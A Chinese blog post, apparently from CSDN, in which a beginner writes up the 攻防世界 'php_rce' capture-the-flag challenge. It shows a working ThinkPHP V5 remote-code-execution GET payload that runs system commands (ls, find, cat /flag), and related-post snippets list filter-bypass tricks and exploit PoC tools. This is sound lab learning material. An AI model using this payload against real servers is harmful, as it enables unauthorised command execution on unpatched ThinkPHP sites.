攻防世界(WEB) php_rce

最新推荐文章于 2024-05-24 23:30:00 发布
最新推荐文章于 2024-05-24 23:30:00 发布
阅读量201 收藏
点赞数 1
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54929891/article/details/119973658
版权

进入题目页面我可以说是一脸懵逼

 我还点了一下链接啥的,结果都是广告,抓了包看了原码没有发现什么问题,于是就上网看了一下别的关于这道题怎么写的,结果发现,这题目考的是ThinkPHP V5版本的那个时候一个漏洞,我顿时就懵了,作为新手根本就没听过这种东西,于是我长达了两天有空就看看,有了一点点感觉

https://blog.csdn.net/qq_40884727/article/details/101452478这个链接是一位博主对当年的漏洞复现,看了几遍,或许是我代码水平不怎么样,还是没怎么懂,只知道这个漏洞是因为对于控制器没有足够的安全检测,导致可以伪造控制器来调用里面的方法并且传入参数来获得getshell,一些代码的实际意义我现在还是不太懂,准备继续看下去,做题本身就是为了学习,就不在乎这题目做了多久了

知道这个题目要用构造payload来,https://www.cnblogs.com/straybirds/p/9807627.html这是对于payload的讲解是什么。

合理利用下面这个get请求(红色地方使我们要改参数的),具体为什么这么些我懂了再继续记录

?s=index/\think\App/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

对system的解释https://www.php.net/manual/zh/function.system.php,相当于现在就是一个命令行,在vars[1][]后面来输入linux或者windows命令(推荐linux命令,因为方便查找flag);

首先肯定试试最简单的ls命令s=index/\think\App/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

 

发现出来了东西,说明这个方向猜想是争取的,我们也拿到了shell。现在便使用linux的查找命令

find / -name "flag"(在系统中查找flag的文件),我试过写flag*会出来很多,根据情况来变

查找到了两个文件,有个新知识点就是发现http://111.200.241.244:53206/?s=index/\think\App/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22

我没有输入%20和%22啊,哪来的啊?然后我一查询这是url编码,是一种 浏览器用来打包表单输入的格式,用来替换一些特殊字符 

对着输入的find / -name "flag"可以发现%20是空格的url编码,%22是“的url编码,不过写的时候不用注意,浏览器会帮我们自动转换的

既然发现了有flag文件,我们便使用cat命令打开cat /flag flag(url会转换为cat%20/flag%20flag)来打开flag文件

题目虽然出来了,但是对于Think PHP V5的漏洞还是不太熟悉,还需要多查资料多看代码 

-栀蓝-
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络安全 | CTF】攻防世界 php_rce 解题详析
等风来
05-22 5425
PHP RCE 指的是通过远程代码执行漏洞(Remote Code Execution)来攻击 PHP 程序的一种方式。简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求参数等),此时通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器的控制。由上图可知,flag字段储存在flag文件夹下的flag文件中。使用thinkphp 5.1.payload进行尝试,根据提示,使用5.0.20版本的Payload。说明命令执行成功,接着抓取flag即可。
绕过之cat|/ flag
m0_61011147的博客
09-06 1966
绕过之cat|/ flag
CTF命令执行的常见姿势
weixin_40103894的博客
09-28 1503
1.**cat fl[abc]g.php ** //匹配[abc]中的任何一个。11.**vi **–使用vi打开文本cat 由第一行开始显示内容,并将所有内容输出。1.**wh\o\ami ** //反斜线绕过。3.**cat fla* ** //用*匹配任意。3.**whoa’m’i ** //单引号绕过。4.**whoam``i ** //反引号绕过。8.**nl **–类似于cat -n,显示时输出行号。
[CTF_网络安全] 攻防世界 php_rce 解题详析
最新发布
Z4400840的博客
05-24 1035
PHP RCE 指的是通过远程代码执行漏洞(Remote Code Execution)来攻击 PHP 程序的一种方式。简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求参数等),攻击者通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器的控制。下面简单介绍一种常见的远程 RCE 漏洞利用方式,即利用 PHP 中的eval函数实现 RCE 的方式。
攻防世界】二十 --- Cat --- Django框架
qq_43168364的博客
12-29 1161
啊大大如哈的任何
ctf攻防世界 WEB题:php_rce
qq_30889301的博客
05-09 929
ThinkPHP是一个基于PHP语言的开源Web应用框架,它提供了一系列的工具和组件,可以帮助开发人员更快速、更高效地构建Web应用程序。ThinkPHP框架具有简单易用、高效稳定、安全可靠等特点,被广泛应用于各种Web应用程序的开发中。对于thinkphp框架Github上有一个专用的漏洞验证工具:https://github.com/zangcc/Aazhen-v3.1。进入靶场后会看到以下内容,非常直观的说明了自己是thinkphp框架。此工具已经给一个可用的url案例,我们只需要更改就可以了。
TDOA_RCE:通达OA综合利用工具
03-03
任意用户登录POC:4个SQL注入POC:2个后台文件上传POC:3个本地文件包含POC:2个前台文件上传POC(非WEB目录):1个任意文件删除POC:1个 工具面板截图 工具利用流程 1.优先利用本地文件包含漏洞 原因是本地文件包含...
RCE.zip_RCE网络_rce_rce分类器
07-14
基于模式识别的RCE网络算法分类器(衰减库仑势法)。利用概率密度进行分类
SMBGhost_RCE_PoC-master.zip
06-11
标题中的"SMBGhost_RCE_PoC-master.zip"是一个压缩包文件,其中包含了与名为"SMBGhost"的安全漏洞相关的远程代码执行(RCE)的概念验证(PoC)代码。这个漏洞被称为CVE-2020-0796,它是在服务器消息块版本3(SMBv3)...
SMBGhost_RCE_PoC
03-18
SMBGhost_RCE_PoC CVE-2020-0796“ SMBGhost”的RCE PoC 仅用于演示目的!仅将此用作参考。严重地。这尚未在我的实验室环境之外进行过测试。它写得很快,需要做一些工作才能更可靠。有时你会蓝屏。除了自我教育以外...
shiro_rce_tool:shiro rce tool 反序列 命令执行 一键工具 回显
04-29
shiro_rce 下载地址:https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip 2021-03-31: 新增自定义或随机useragent randomagent --> random useragent useragent= --> set useragent cookiename= --&...
攻防世界——php_rce
weixin_73942557的博客
10-16 201
在网上查找这个东西,发现有远程命令执行漏洞。利用已经构造好的payload直接上。看到了flag查看路径获取它。攻防世界——php_rce。使用whereis命令查找。
攻防世界】三 --- php_rce
qq_43168364的博客
12-23 430
题目 — php_rce 一、writeup 主页中提示使用了ThinkPHP V5 在github中搜一下ThinkPHP V5的相关漏洞,可以找到一些 由于我们不知其具体的版本,随便找一个执行一下,这里选择第一个 会显出了root 说明thinkphp的版本可能就是:5.0.22,在选择下面的命令执行paylaod执行 可以执行命令 执行find命令查找flag相关文件 可以在根目录下找到flag文件 使用cat命令可以看到flag 二、知识点 Thinkphp5 的 5.0.22
php_rce(攻防世界lv.2)
qq_66013948的博客
10-25 310
可以看到当前目录内的文件,既然这样能够成功,那么我们就可以试着把退回根目录找有关flag的文件夹或者文件,最后在根目录上找的了个flag的文件夹,之后就是构造payload为。这是一道关于thinkphp5的一个典型的rce漏洞,可以去。里面看有关漏洞的分析,通常构造的payload为。可以看到flag了。
攻防世界-web-php_rce
wuh2333的博客
05-15 495
攻防世界web安全,rce
攻防世界php_rce
qq_45955869的博客
05-26 82
提示:攻防世界php_rceThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。
胡乱自学黑客的,能骂醒一个算一个
2401_84208172的博客
05-05 720
为啥说胡乱自学黑客的,能骂醒一个算一个。因为很多人学会个工具就觉得自己是黑客了,其实再真正的黑客眼里,你就是个脚本小子而已。首先我谈下对黑客&网络安全的认知,其实最重要的是兴趣热爱,不同于网络安全工程师,他们大都是培训机构培训出来的,具备的基本都是防御和白帽子技能,他们绝大多数的人看的是工资,他们是为了就业而学习,为了走捷径才去参加培训。
ping cat.flag.php,关于2020年强网杯-强网先锋-主动的赛题解析
weixin_30764401的博客
03-26 674
原标题:关于2020年强网杯-强网先锋-主动的赛题解析一、基本信息(总概述)本题涉及知识点:命令执行正则匹配linux命令绕过二、基本环境和工具Linux系统PHP+ApacheFirefoxIndex.phpFlag.php三、Writeup1、根据题目要求还原实验环境首先在Linux虚拟机上安装ApacheYum install httpd 安装PHP环境Yum install php 在re...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值